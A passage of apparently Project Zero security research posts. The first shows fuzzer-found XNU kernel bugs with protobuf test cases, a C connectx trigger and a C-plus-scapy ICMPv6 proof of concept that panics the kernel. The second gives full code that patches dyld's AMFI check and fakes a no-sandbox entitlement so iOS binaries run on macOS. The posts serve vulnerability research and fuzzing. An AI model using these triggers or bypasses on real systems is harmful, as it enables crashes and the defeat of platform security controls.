          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"
        }
      }
      sae_dstaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: ""
        }
      }
    }
    associd: ASSOCID_CASE_0
    flags: CONNECT_DATA_IDEMPOTENT
    flags: CONNECT_DATA_IDEMPOTENT
    flags: CONNECT_DATA_IDEMPOTENT
  }
}
commands {
  connectx {
    socket: FD_0
    endpoints {
      sae_srcif: IFIDX_CASE_0
      sae_dstaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: ""
        }
      }
    }
    associd: ASSOCID_CASE_0
    flags: CONNECT_DATA_IDEMPOTENT
  }
}
commands {
  connectx {
    socket: FD_0
    endpoints {
      sae_srcif: IFIDX_CASE_0
      sae_srcaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: ""
        }
      }
      sae_dstaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304"
        }
      }
    }
    associd: ASSOCID_CASE_0
    flags: CONNECT_DATA_IDEMPOTENT
    flags: CONNECT_DATA_IDEMPOTENT
    flags: CONNECT_DATA_AUTHENTICATED
  }
}
commands {
  connectx {
    socket: FD_0
    endpoints {
      sae_srcif: IFIDX_CASE_0
      sae_dstaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: ""
        }
      }
    }
    associd: ASSOCID_CASE_0
    flags: CONNECT_DATA_IDEMPOTENT
  }
}
commands {
  close {
    fd: FD_8
  }
}
commands {
  ioctl_real {
    siocsifflags {
      ifr_name: LO0
      flags: IFF_LINK1
    }
  }
}
commands {
  close {
    fd: FD_8
  }
}
data_provider: "\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025"

Hmm, that's quite large and hard to follow. Is the bug really that complicated? We can use libFuzzer's crash minimization feature to find out. Protobuf-based test cases simplify nicely because even large test cases are already structured, so we can randomly edit and remove nodes from the message. After about a minute of automated minimization, we end up with the test shown below.

commands {
  socket {
    domain: AF_MULTIPATH
    so_type: SOCK_STREAM
    protocol: IPPROTO_IP
  }
}
commands {
  connectx {
    socket: FD_0
    endpoints {
      sae_srcif: IFIDX_CASE_1
      sae_dstaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
          sa_data: "bugmbuf_debutoeloListen_dedeloListen_dedebuloListete_debugmbuf_debutoeloListen_dedeloListen_dedebuloListeListen_dedebuloListe_dtrte" # string length 131
        }
      }
    }
    associd: ASSOCID_CASE_0
  }
}

data_provider: ""


This is a lot easier to read! It appears that SockFuzzer managed to open a socket in the AF_MULTIPATH domain and called connectx on it with a sockaddr using an unexpected sa_family, in this case AF_MULTIPATH. The large sa_data field was then used to overwrite memory. You can see artifacts of the heuristics the fuzzer uses to guess strings, as "Listen" and "mbuf" appear in the input. This test case could be simplified further by changing sa_data to a repeated character, but I left it as is so you can see exactly what it's like to work with the output of this fuzzer.
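For readers who want to see what the minimized test case corresponds to outside the fuzzer, it translates to roughly the following untested sketch. AF_MULTIPATH is a private XNU constant (its value below is an assumption), and connectx(2) on a multipath socket may require additional entitlements; treat this as an illustration of the syscall sequence, not a ready-made PoC.

#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>

#ifndef AF_MULTIPATH
#define AF_MULTIPATH 39     /* private XNU constant; assumed value */
#endif

int trigger(void) {
    int fd = socket(AF_MULTIPATH, SOCK_STREAM, IPPROTO_IP);
    if (fd < 0)
        return -1;

    /* Destination sockaddr with the unexpected AF_MULTIPATH family and a
     * large attacker-controlled sa_data (cf. the 131-byte string above). */
    struct sockaddr_storage dst;
    memset(&dst, 'A', sizeof(dst));
    dst.ss_len = sizeof(dst);
    dst.ss_family = AF_MULTIPATH;

    sa_endpoints_t eps = {
        .sae_srcif = 1,                          /* analogue of IFIDX_CASE_1 */
        .sae_dstaddr = (struct sockaddr *)&dst,
        .sae_dstaddrlen = sizeof(dst),
    };
    return connectx(fd, &eps, SAE_ASSOCID_ANY, 0, NULL, 0, NULL, NULL);
}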

In my experience, the protobuf-formatted syscalls and packet descriptions were highly useful for reproducing crashes and tended to work on the first attempt. I didn't have an excellent setup for debugging on-device, so I tried to lean on the fuzzing framework as much as I could to understand issues before proceeding with the expensive process of reproducing them.

In my previous post describing the "SockPuppet" vulnerability, I walked through one of the newly discovered vulnerabilities, from protobuf to exploit. I'd like to share another original protobuf bug report for a remotely-triggered vulnerability I reported here.

commands {
  socket {
    domain: AF_INET6
    so_type: SOCK_RAW
    protocol: IPPROTO_IP
  }
}
commands {
  set_sock_opt {
    level: SOL_SOCKET
    name: SO_RCVBUF
    val: "\021\000\000\000"
  }
}
commands {
  set_sock_opt {
    level: IPPROTO_IPV6
    name: IP_FW_ZERO
    val: "\377\377\377\377"
  }
}
commands {
  ip_input {
    tcp6_packet {
      ip6_hdr {
        ip6_hdrctl {
          ip6_un1_flow: 0
          ip6_un1_plen: 0
          ip6_un1_nxt: IPPROTO_ICMPV6
          ip6_un1_hlim: 0
        }
        ip6_src: IN6_ADDR_LOOPBACK
        ip6_dst: IN6_ADDR_ANY
      }
      tcp_hdr {
        th_sport: PORT_2
        th_dport: PORT_1
        th_seq: SEQ_1
        th_ack: SEQ_1
        th_off: 0
        th_win: 0
        th_sum: 0
        th_urp: 0
        is_pure_syn: false
        is_pure_ack: false
      }

Β  Β  Β  data:Β "\377\377\377\377\377\377\377\377\377\377\377\377q\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"

    }
  }
}

data_provider: ""

This automatically minimized test case requires some human translation to a report that's actionable by developers who don't have access to our fuzzing framework. The test creates a socket and sets some options before delivering a crafted ICMPv6 packet. You can see how the packet grammar we specified comes in handy. I started by transcribing the first three syscall messages directly by writing the following C program.

#include <sys/socket.h>
#define __APPLE_USE_RFC_3542
#include <netinet/in.h>
#include <stdio.h>
#include <unistd.h>

int main() {
    int fd = socket(AF_INET6, SOCK_RAW, IPPROTO_IP);
    if (fd < 0) {
        printf("failed\n");
        return 0;
    }
    int res;
    // This is not needed to cause a crash on macOS 10.14.6, but you can
    // try setting this option if you can't reproduce the issue.
    // int space = 1;
    // res = setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &space, sizeof(space));
    // printf("res1: %d\n", res);
    int enable = 1;
    res = setsockopt(fd, IPPROTO_IPV6, IPV6_RECVPATHMTU, &enable, sizeof(enable));
    printf("res2: %d\n", res);
    // Keep the socket open without terminating.
    while (1) {
        sleep(5);
    }
    close(fd);
    return 0;
}

With the socket open, it's now a matter of sending a special ICMPv6 packet to trigger the bug. Using the original crash as a guide, I reviewed the code around the crashing instruction to understand which parts of the input were relevant. I discovered that sending a "packet too big" notification would reach the buggy code, so I used the scapy library for Python to send the buggy packet locally. My kernel panicked, confirming the double free vulnerability.

from scapy.all import sr1, IPv6, ICMPv6PacketTooBig, raw

outer = IPv6(dst="::1") / ICMPv6PacketTooBig() / ("\x41"*40)
print(raw(outer).hex())
p = sr1(outer)
if p:
    p.show()

Creating a working PoC from the crashing protobuf input took about an hour, thanks to the straightforward mapping from grammar to syscalls/network input and the utility of being able to debug the local crashing "kernel" using gdb.

Drawbacks

Any fuzzing project of this size will require design decisions that have some tradeoffs. The most obvious issue is the inability to detect race conditions. Threading bugs can be found with fuzzing but are still best left to static analysis and manual review, as fuzzers can't currently deal with the state space of interleaving threads. Maybe this will change in the future, but today it's an issue. I accepted this problem and removed threading completely from the fuzzer; this caused some bugs to be missed, such as a race condition in the bind syscall.

Another issue stems from replacing so much functionality by hand: it's hard to extend the fuzzer to support additional attack surfaces. This is evidenced by another issue I missed in packet filtering. I don't support VFS at the moment, so I can't access the bpf device. A syzkaller-like project would have less trouble supporting this code since VFS would already be working. I made an explicit decision to build a simple tool that works very effectively, but this can mean missing some low-hanging fruit due to the effort involved.

Per-test-case determinism is an issue that I've only partially solved. If test cases aren't deterministic, libFuzzer becomes less efficient, as it thinks some tests are finding new coverage when they really depend on one that ran previously. To mitigate this problem, I track open file descriptors manually and run all of the garbage collection thread functions after each test case. Unfortunately, there are many ioctls that change state in the background. It's hard to keep track of them well enough to clean up properly, but they are important enough that it's not worth disabling them just to improve determinism. If I were working on a long-term, well-resourced overhaul of the XNU network stack, I would probably make sure there's a way to cleanly tear down the whole stack to prevent this problem.
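As an illustration, the per-test-case teardown boils down to something like the following sketch. The tracking array, close_wrapper and run_gc_threads are hypothetical stand-ins for the fuzzer's real bookkeeping, not its actual names.

#define MAX_TRACKED_FDS 128

extern int close_wrapper(int fd);   /* the fuzzer's close() shim (assumed name) */
extern void run_gc_threads(void);   /* drains deferred kernel work (assumed name) */

static int tracked_fds[MAX_TRACKED_FDS];
static int num_tracked_fds;

void track_fd(int fd) {
    if (fd >= 0 && num_tracked_fds < MAX_TRACKED_FDS)
        tracked_fds[num_tracked_fds++] = fd;   /* remember fd for teardown */
}

void end_test_case(void) {
    /* Close everything this test case opened so the next test starts clean. */
    for (int i = 0; i < num_tracked_fds; i++)
        close_wrapper(tracked_fds[i]);
    num_tracked_fds = 0;
    /* Run the stack's garbage collection thread functions synchronously so
     * background state does not leak into the next test case. */
    run_gc_threads();
}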

Perhaps the largest caveat of this project is its reliance on source code. Working from source spares me the efficiency and productivity losses that come with binary-only research and lets me study the problem close to the source. But I humbly admit that this approach ignores many targets and doesn't necessarily match real attackers' workflows. Real attackers take the shortest path they can to find an exploitable vulnerability, and often that path runs through bugs found via binary-based fuzzing or reverse engineering and auditing. I intend to discover some of the best practices for fuzzing with source and then migrate this approach to work with binaries. Binary instrumentation can assist in coverage-guided fuzzing, but some of my tricks, such as substituting fake implementations or changing behavior to be more fuzz-friendly, are a more significant burden when working with binaries. But I believe these are tractable problems, and I expect researchers can adapt some of these techniques to binary-only fuzzing efforts, even if there is additional overhead.

Open Sourcing and Future Work

This fuzzer is now open source on GitHub. I invite you to study the code and improve it! I'd like to continue the development of this fuzzer semi-publicly. Some modifications that yield new vulnerabilities may need to be embargoed until relevant patches go out. Still, I hope that I can be as transparent as possible in my research. By working publicly, it may be possible to bring the original XNU project and this fuzzer closer together by sharing the efforts. I'm hoping the upstream developers can make use of this project to perform their own testing and perhaps make their own improvements to XNU to make this type of testing more accessible. There's plenty of remaining work to improve the existing grammar, add support for new subsystems, and deal with some high-level design improvements such as adding proper threading support.

An interesting property of the current fuzzer is that despite reaching coverage saturation on ClusterFuzz after many months, there is still reachable but uncovered code due to the enormous search space. This means that improvements in coverage-guided fuzzing could find new bugs. I'd like to encourage teams who perform fuzzing engine research to use this project as a baseline. If you find a bug, you can take the credit for it! I simply hope you share your improvements with me and the rest of the community.

Conclusion

Modern kernel development has some catching up to do. XNU and Linux suffer from some process failures that lead to shipping security regressions. Kernels, perhaps the most security-critical component of operating systems, are becoming increasingly fragile as memory corruption issues become easier to discover. Implementing better mitigations is half the battle; we need better kernel unit testing to make identifying and fixing (even non-security) bugs cheaper.

Since my last post, Apple has increased the frequency of its open-source releases. This is great for end-user security. The more publicly that Apple can develop XNU, the more that external contributors like myself may have a chance to contribute fixes and improvements directly. Maintaining internal branches for upcoming product launches while keeping most development open has helped Chromium and Android security, and I believe XNU's development could follow this model. As software engineering grows as a field, our experience has shown us that open, shared, and continuous development has a real impact on software quality and stability by improving developer productivity. If you don't invest in CI, unit testing, security reviews, and fuzzing, attackers may do that for you - and users pay the cost whether they recognize it or not.

Fuzzing iOS code on macOS at native speed

By: Ryan
20 May 2021 at 17:07

Or how iOS apps on macOS work under the hood

Posted by Samuel Groß, Project Zero

This short post explains how code compiled for iOS can be run natively on Apple Silicon Macs.

With the introduction of Apple Silicon Macs, Apple also made it possible to run iOS apps natively on these Macs. This is fundamentally possible due to (1) iPhones and Apple Silicon Macs both using the arm64 instruction set architecture (ISA) and (2) macOS using a mostly compatible set of runtime libraries and frameworks while also providing /System/iOSSupport which contains the parts of the iOS runtime that do not exist on macOS. Due to this, it should be possible to run not just complete apps but also standalone iOS binaries or libraries on Mac. This might be interesting for a number of reasons, including:

  • It allows fuzzing closed-source code compiled for iOS on a Mac
  • It allows dynamic analysis of iOS code in a more "friendly" environment

This post explains how this can be achieved in practice. The corresponding code can be found here and allows executing arbitrary iOS binaries and library code natively on macOS. The tool assumes that SIP has been disabled and has been tested on macOS 11.2 and 11.3. With SIP enabled, certain steps will probably fail.

We originally developed this tool for fuzzing a 3rd-party iOS messaging app. While that particular project didn't yield any interesting results, we are making the tool public as it could help lower the barrier of entry for iOS security research.

The Goal

The ultimate goal of this project is to execute code compiled for iOS natively on macOS. While it would be possible to achieve this goal (at least for some binaries/libraries) simply by swapping the platform identifier in the mach-o binary, our approach will instead use the existing infrastructure for running iOS apps on macOS. This has two benefits:

  1. It will guarantee that all dependent system libraries of the iOS code will exist. In practice, this means that if a dependent library does not already exist on macOS, it will automatically be loaded from /System/iOSSupport instead
  2. The runtime (OS services, frameworks, etc.) will, if necessary, emulate their iOS behavior since they will know that the process is an iOS one

To start, we'll take a simple piece of C source code and compile it for iOS:

> cat hello.c
#include <stdio.h>

int main() {
    puts("Hello from an iOS binary!");
    return 0;
}

> clang -arch arm64 hello.c -o hello -isysroot \
/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk

> file hello
hello: Mach-O 64-bit executable arm64

> otool -l hello
...
Load command 10
      cmd LC_BUILD_VERSION
  cmdsize 32
 platform 2           # Platform 2 is iOS
    minos 14.4
      sdk 14.4
   ntools 1
     tool 3
  version 609.8
...

The Kernel

Attempting to execute the freshly compiled binary (on macOS 11.2) will simply result in

> ./hello
[1]    13699 killed     ./hello

While the exit status informs us that the process was terminated through SIGKILL, it does not contain any additional information about the specific reason for that. However, it does seem likely that the process is terminated by the kernel during the execve(2) or posix_spawn(2) syscall. And indeed, the crash report generated by the system states:

Termination Reason: Β  Β EXEC, [0xe] Binary with wrong platform

This error corresponds to EXEC_EXIT_REASON_WRONG_PLATFORM in the kernel, and that constant is only referenced in a single function: check_for_signature:

static int
check_for_signature(proc_t p, struct image_params *imgp)
{
    ...;
#if XNU_TARGET_OS_OSX
    /* Check for platform passed in spawn attr if iOS binary is being spawned */
    if (proc_platform(p) == PLATFORM_IOS) {
        struct _posix_spawnattr *psa = imgp->ip_px_sa;
        if (psa == NULL || psa->psa_platform == 0) {
            ...;
            signature_failure_reason = os_reason_create(OS_REASON_EXEC,
                EXEC_EXIT_REASON_WRONG_PLATFORM);
            error = EACCES;
            goto done;
        } else if (psa->psa_platform != PLATFORM_IOS) {
            /* Simulator binary spawned with wrong platform */
            signature_failure_reason = os_reason_create(OS_REASON_EXEC,
                EXEC_EXIT_REASON_WRONG_PLATFORM);
            error = EACCES;
            goto done;
        } else {
            printf("Allowing spawn of iOS binary %s since "
                "correct platform was passed in spawn\n", p->p_name);
        }
    }
#endif /* XNU_TARGET_OS_OSX */
    ...;
}

This code is active on macOS and will execute if the platform of the to-be-executed process is PLATFORM_IOS. In essence, the code checks for an undocumented posix_spawn attribute, psa_platform, and in its absence (or if its value is not PLATFORM_IOS) will terminate the process in the way we previously observed.

As such, to avoid EXEC_EXIT_REASON_WRONG_PLATFORM, it should only be necessary to use the undocumented posix_spawnattr_set_platform_np API to set the target platform to PLATFORM_IOS, then invoke posix_spawn to execute the iOS binary:

    posix_spawnattr_t attr;
    posix_spawnattr_init(&attr);
    posix_spawnattr_set_platform_np(&attr, PLATFORM_IOS, 0);
    posix_spawn(&pid, binary_path, NULL, &attr, argv, environ);

Doing that will now result in:

> ./runner hello

...

[*] Child exited with status 5

No more SIGKILL, progress! Exit status 5 corresponds to SIGTRAP, which likely implies that the process is now terminating in userspace. And indeed, the crash report confirms that the process is crashing sometime during library initialization now.

Userspace

At this point we have a PLATFORM_IOS process running in macOS userspace. The next thing that now happens is that dyld, the dynamic linker, starts mapping all libraries that the binary depends on and executes any initializers they might have. Unfortunately, one of the first libraries now being initialized, libsystem_secinit.dylib, tries to determine whether it should initialize the app sandbox based on the binary's platform and its entitlements. The logic is roughly:

initialize_app_sandbox = False
if entitlement("com.apple.security.app-sandbox") == True:
    initialize_app_sandbox = True
if active_platform() == PLATFORM_IOS &&
   entitlement("com.apple.private.security.no-sandbox") != True:
    initialize_app_sandbox = True

As such, libsystem_secinit will decide that it should initialize the app sandbox and will then contact secinitd(8), "the security policy initialization daemon", to obtain a sandbox profile. As that daemon cannot determine the app corresponding to the process in question, it will fail, and libsystem_secinit.dylib will then abort(3) the process:

(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BREAKPOINT
  * frame #0: libsystem_secinit.dylib`_libsecinit_appsandbox.cold.5
    frame #1: libsystem_secinit.dylib`_libsecinit_appsandbox
    frame #2: libsystem_trace.dylib` ...
    frame #3: libsystem_secinit.dylib`_libsecinit_initializer
    frame #4: libSystem.B.dylib`libSystem_initializer
    frame #5: libdyld.dylib`...
    frame #6: libdyld.dylib`...
    frame #7: libdyld.dylib`dyld3::AllImages::runLibSystemInitializer
    frame #8: libdyld.dylib`...
    frame #9: dyld`...
    frame #10: dyld`dyld::_main
    frame #11: dyld`dyldbootstrap::start
    frame #12: dyld`_dyld_start + 56

As a side note, logic like the above will turn out to be a somewhat common theme: various components responsible for the runtime environment will have special handling for iOS binaries, in which case they tend to enforce various policies more aggressively.

One possible way to solve this would be to sign the iOS binary with a self-signed (and locally trusted) code signing certificate and grant it the "com.apple.private.security.no-sandbox" entitlement. This would then cause libsystem_secinit to not attempt to initialize the app sandbox. Unfortunately, it seems that while AppleMobileFileIntegrity ("amfi" - the OS component implementing various security policies like entitlement and code signing checks) will allow macOS binaries to be signed by locally-trusted code-signing certificates if SIP is disabled, it will not do so for iOS binaries. Instead, it appears to enforce roughly the same requirements as on iOS, namely that the binary must either be signed by Apple directly (in case the app is downloaded from the app store) or there must exist a valid (i.e. one signed by Apple) provisioning profile for the code-signing entity which explicitly allows the entitlements. As such, this path appears to be a dead end.

Another way to work around the sandbox initialization would be to use dyld interposing to replace xpc_copy_entitlements_for_self, which libsystem_secinit invokes to obtain the process' entitlements, with another function that simply returns the "com.apple.private.security.no-sandbox" entitlement. This would in turn prevent libsystem_secinit from attempting to initialize the sandbox.

Unfortunately, the iOS process is subject to further restrictions, likely part of the "hardened runtime" suite, which causes dyld to disable library interposing (some more information on this mechanism is available here). This policy is also implemented by amfi, in AppleMobileFileIntegrity.kext (the kernel component of amfi):

__int64 __fastcall macos_dyld_policy_library_interposing(proc *a1, int *a2)
{
  int v3; // w8

  v3 = *a2;
  ...
  if ( (v3 & 0x10400) == 0x10000 )   // flag is set for iOS binaries
  {
    logDyldPolicyRejection(a1, "library interposing", "Denying library interposing for iOS app\n");
    return 0LL;
  }
  return 64LL;
}

As can be seen, AMFI will deny library interposing for all iOS binaries. Unfortunately, I couldn't come up with a better solution for this than to patch the code of dyld at runtime to ignore AMFI's policy decision and thus allow library interposing. Fortunately though, doing lightweight runtime code patching is fairly easy through the use of some classic mach APIs:

  1. Find the offset of _amfi_check_dyld_policy_self in /usr/lib/dyld, e.g. with nm(1)
  2. Start the iOS process with the POSIX_SPAWN_START_SUSPENDED attribute so it is initially suspended (the equivalent of SIGSTOP). At this point, only dyld and the binary itself will have been mapped into the process' memory space by the kernel.
  3. "Attach" to the process using task_for_pid
  4. Find the location of dyld in memory through vm_region_recurse_64
  5. Map dyld's code section writable using vm_protect(VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY) (where VM_PROT_COPY is seemingly necessary to force the pages to be copied since they are shared)
  6. Patch _amfi_check_dyld_policy_self through vm_write to simply return 0x5f (indicating that dyld interposing and other features should be allowed)
  7. Map dyld's code section executable again

To be able to use the task_for_pid trap, the runner binary will either need the "com.apple.security.cs.debugger" entitlement or root privileges. However, as the runner is a macOS binary, it can be given this entitlement through a self-signed certificate which amfi will then allow.

As such, the full steps necessary to launch an iOS binary on macOS are:

  1. Use the posix_spawnattr_set_platform_np API to set the target platform to PLATFORM_IOS
  2. Execute the new process via posix_spawn(2) and start it suspended
  3. Patch dyld to allow library interposing
  4. In the interposed library, claim to possess the "com.apple.private.security.no-sandbox" entitlement by replacing xpc_copy_entitlements_for_self
  5. Continue the process by sending it SIGCONT

This can now be seen in action:

> cat hello.c
#include <stdio.h>

int main() {
    puts("Hello from an iOS binary!");
    return 0;
}

> clang -arch arm64 hello.c -o hello -isysroot \
/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk interpose.dylib

> ./runner hello
[*] Preparing to execute iOS binary hello
[+] Child process created with pid: 48302
[*] Patching child process to allow dyld interposing...
[*] _amfi_check_dyld_policy_self at offset 0x54d94 in /usr/lib/dyld
[*] /usr/lib/dyld mapped at 0x1049ec000
[+] Successfully patched _amfi_check_dyld_policy_self
[*] Sending SIGCONT to continue child
[*] Faking no-sandbox entitlement in xpc_copy_entitlements_for_self
Hello from an iOS binary!
[*] Child exited with status 0

Fuzzing

With the ability to launch iOS processes, it now becomes possible to fuzz existing iOS code natively on macOS as well. I decided to use Honggfuzz for a simple PoC of this that also used lightweight coverage guidance (based on the Trapfuzz instrumentation approach). The main issue with this approach is that honggfuzz uses the combination of fork(2) followed by execve(2) to create the child processes, while also performing various operations, such as dup2'ing file descriptors and setting environment variables, after forking but before exec'ing. However, the iOS binary must be executed through posix_spawn, which means that these operations must be performed at some other time. Furthermore, as honggfuzz itself is still compiled for macOS, some steps of the compilation of the target binary will fail (they will attempt to link previously compiled .o files, but now the platform no longer matches) and so have to be replaced. There are certainly better ways to do this (and I encourage the reader to implement it properly), but this was the approach that I got to work the quickest.

The hacky proof-of-concept patch for honggfuzz can be found here. In addition to building honggfuzz for arm64, the honggfuzz binary is subsequently signed and given the "com.apple.security.cs.debugger" entitlement in order for task_for_pid to work.

Conclusion

This blog post discussed how iOS apps are run on macOS and how that functionality can be used to execute any code compiled for iOS natively on macOS. This in turn can facilitate dynamic analysis and fuzzing of iOS code, and thus might make the platform a tiny bit more open for security researchers.


Attachment 1: runner.c

// clang -o runner runner.c
// cat <<EOF > entitlements.xml
// <?xml version="1.0" encoding="UTF-8"?>
// <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
// <plist version="1.0">
// <dict>
//     <key>com.apple.security.cs.debugger</key>
//     <true/>
// </dict>
// </plist>
// EOF
// # Find available code signing identities using `security find-identity`
// codesign -s "$IDENTITY" --entitlements entitlements.xml runner
//

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <dlfcn.h>
#include <signal.h>
#include <unistd.h>
#include <spawn.h>
#include <sys/wait.h>
#include <mach/mach_init.h>
#include <mach/vm_map.h>
#include <mach/vm_page_size.h>

#define page_align(addr) (vm_address_t)((uintptr_t)(addr) & (~(vm_page_size - 1)))

#define PLATFORM_IOS 2

extern char **environ;
extern int posix_spawnattr_set_platform_np(posix_spawnattr_t*, int, int);

void instrument(pid_t pid) {
    kern_return_t kr;
    task_t task;

    puts("[*] Patching child process to allow dyld interposing...");

    // Find patch point
    FILE* output = popen("nm -arch arm64e /usr/lib/dyld | grep _amfi_check_dyld_policy_self", "r");
    unsigned int patch_offset;
    int r = fscanf(output, "%x t _amfi_check_dyld_policy_self", &patch_offset);
    if (r != 1) {
        printf("Failed to find offset of _amfi_check_dyld_policy_self in /usr/lib/dyld\n");
        return;
    }
    printf("[*] _amfi_check_dyld_policy_self at offset 0x%x in /usr/lib/dyld\n", patch_offset);

    // Attach to the target process
    kr = task_for_pid(mach_task_self(), pid, &task);
    if (kr != KERN_SUCCESS) {
        printf("task_for_pid failed. Is this binary signed and possesses the com.apple.security.cs.debugger entitlement?\n");
        return;
    }

    vm_address_t dyld_addr = 0;
    int headers_found = 0;
    vm_address_t addr = 0;
    vm_size_t size;
    vm_region_submap_info_data_64_t info;
    mach_msg_type_number_t info_count = VM_REGION_SUBMAP_INFO_COUNT_64;
    unsigned int depth = 0;
    while (1) {
        // get next memory region
        kr = vm_region_recurse_64(task, &addr, &size, &depth, (vm_region_info_t)&info, &info_count);
        if (kr != KERN_SUCCESS)
            break;

        unsigned int header;
        vm_size_t bytes_read;
        kr = vm_read_overwrite(task, addr, 4, (vm_address_t)&header, &bytes_read);
        if (kr != KERN_SUCCESS) {
            // TODO handle this, some mappings are probably just not readable
            printf("vm_read_overwrite failed\n");
            return;
        }
        if (bytes_read != 4) {
            // TODO handle this properly
            printf("[-] vm_read read too few bytes\n");
            return;
        }
        if (header == 0xfeedfacf) {
            headers_found++;
        }
        if (headers_found == 2) {
            // This is dyld
            dyld_addr = addr;
            break;
        }
        addr += size;
    }
    if (dyld_addr == 0) {
        printf("[-] Failed to find /usr/lib/dyld\n");
        return;
    }
    printf("[*] /usr/lib/dyld mapped at 0x%lx\n", dyld_addr);

    vm_address_t patch_addr = dyld_addr + patch_offset;
    // VM_PROT_COPY forces COW, probably, see vm_map_protect in vm_map.c
    kr = vm_protect(task, page_align(patch_addr), vm_page_size, false, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY);
    if (kr != KERN_SUCCESS) {
        printf("vm_protect failed\n");
        return;
    }

    // MOV X8, 0x5f
    // STR X8, [X1]
    // RET
    const char* code = "\xe8\x0b\x80\xd2\x28\x00\x00\xf9\xc0\x03\x5f\xd6";
    kr = vm_write(task, patch_addr, (vm_offset_t)code, 12);
    if (kr != KERN_SUCCESS) {
        printf("vm_write failed\n");
        return;
    }
    kr = vm_protect(task, page_align(patch_addr), vm_page_size, false, VM_PROT_READ | VM_PROT_EXECUTE);
    if (kr != KERN_SUCCESS) {
        printf("vm_protect failed\n");
        return;
    }
    puts("[+] Successfully patched _amfi_check_dyld_policy_self");
}

int run(const char** argv) {
    pid_t pid;
    int rv;
    posix_spawnattr_t attr;

    rv = posix_spawnattr_init(&attr);
    if (rv != 0) {
        perror("posix_spawnattr_init");
        return -1;
    }
    rv = posix_spawnattr_setflags(&attr, POSIX_SPAWN_START_SUSPENDED);
    if (rv != 0) {
        perror("posix_spawnattr_setflags");
        return -1;
    }
    rv = posix_spawnattr_set_platform_np(&attr, PLATFORM_IOS, 0);
    if (rv != 0) {
        perror("posix_spawnattr_set_platform_np");
        return -1;
    }
    rv = posix_spawn(&pid, argv[0], NULL, &attr, (char* const*)argv, environ);
    if (rv != 0) {
        perror("posix_spawn");
        return -1;
    }
    printf("[+] Child process created with pid: %i\n", pid);

    instrument(pid);

    printf("[*] Sending SIGCONT to continue child\n");
    kill(pid, SIGCONT);

    int status;
    rv = waitpid(pid, &status, 0);
    if (rv == -1) {
        perror("waitpid");
        return -1;
    }
    printf("[*] Child exited with status %i\n", status);
    posix_spawnattr_destroy(&attr);
    return 0;
}

int main(int argc, char* argv[]) {
    if (argc <= 1) {
        printf("Usage: %s path/to/ios_binary\n", argv[0]);
        return 0;
    }
    printf("[*] Preparing to execute iOS binary %s\n", argv[1]);
    return run((const char**)(argv + 1));
}

Attachment 2: interpose.c

// clang interpose.c -arch arm64 -o interpose.dylib -shared -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk

#include <stdio.h>
#include <unistd.h>

typedef void* xpc_object_t;
extern xpc_object_t xpc_dictionary_create(void*, void*, int);
extern void xpc_dictionary_set_value(xpc_object_t, const char*, xpc_object_t);
extern xpc_object_t xpc_bool_create(int);
extern xpc_object_t xpc_copy_entitlements_for_self();

// From https://opensource.apple.com/source/dyld/dyld-97.1/include/mach-o/dyld-interposing.h.auto.html
/*
 *  Example:
 *
 *  static
 *  int
 *  my_open(const char* path, int flags, mode_t mode)
 *  {
 *    int value;
 *    // do stuff before open (including changing the arguments)
 *    value = open(path, flags, mode);
 *    // do stuff after open (including changing the return value(s))
 *    return value;
 *  }
 *  DYLD_INTERPOSE(my_open, open)
 */

#define DYLD_INTERPOSE(_replacment,_replacee) \
   __attribute__((used)) static struct{ const void* replacment; const void* replacee; } _interpose_##_replacee \
            __attribute__ ((section ("__DATA,__interpose"))) = { (const void*)(unsigned long)&_replacment, (const void*)(unsigned long)&_replacee };

xpc_object_t my_xpc_copy_entitlements_for_self() {
    puts("[*] Faking com.apple.private.security.no-sandbox entitlement in interposed xpc_copy_entitlements_for_self");
    xpc_object_t dict = xpc_dictionary_create(NULL, NULL, 0);
    xpc_dictionary_set_value(dict, "com.apple.private.security.no-sandbox", xpc_bool_create(1));
    return dict;
}

DYLD_INTERPOSE(my_xpc_copy_entitlements_for_self, xpc_copy_entitlements_for_self);

An EPYC escape: Case-study of a KVM breakout

By: Ryan
29 June 2021 at 15:58

